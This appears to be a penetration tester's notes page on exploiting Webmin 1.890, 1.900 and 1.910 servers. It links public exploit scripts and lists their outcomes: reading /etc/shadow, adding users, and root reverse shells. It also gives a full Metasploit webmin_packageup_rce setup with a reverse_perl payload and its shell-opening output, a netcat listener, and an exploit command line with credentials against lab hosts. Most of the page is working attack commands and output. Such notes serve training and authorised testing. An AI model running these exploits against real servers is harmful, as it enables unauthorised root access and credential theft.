Webmin

Webmin 1.8.90

MiniServ 1.890 (Webmin httpd)
https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py
Read /etc/shadow
Add user
Reverse Shells
Read the config files
Will run as root

Webmin 1.900

MiniServ 1.900 (Webmin httpd)
Requires credentials in order to exploit
can use a metasploit module once credentials are obtained

exploit/linux/http/webmin_packageup_rce
PASSWORD   Password6543     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.1.17      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                         -metasploit.html
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   admin            yes       Webmin Username

cmd/unix/reverse_perl
LHOST  10.10.14.2       yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port

run

[*] Started reverse TCP handler on 10.10.14.2:8888 
[+] Session cookie: bda1415ad657230f23aac213aa96a878
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:8888 -> 10.10.110.3:10784) at 2024-04-13 21:21:53 -0400

Webmin Version 1.910 - Privilege Escalation

Authenticated
https://github.com/roughiz/Webmin-1.910-Exploit-Script
Start your virtual env

source venv/bin/activate

start your listener

nc -nlvp 443

Send it

python2 webmin_exploit.py --rhost 10.129.2.1 --rport 10000 --lhost 10.10.14.76 --lport 443 -u Matt -p computer2008 -s True

PreviousJenkins Nextpersistence

Last updated 19 days ago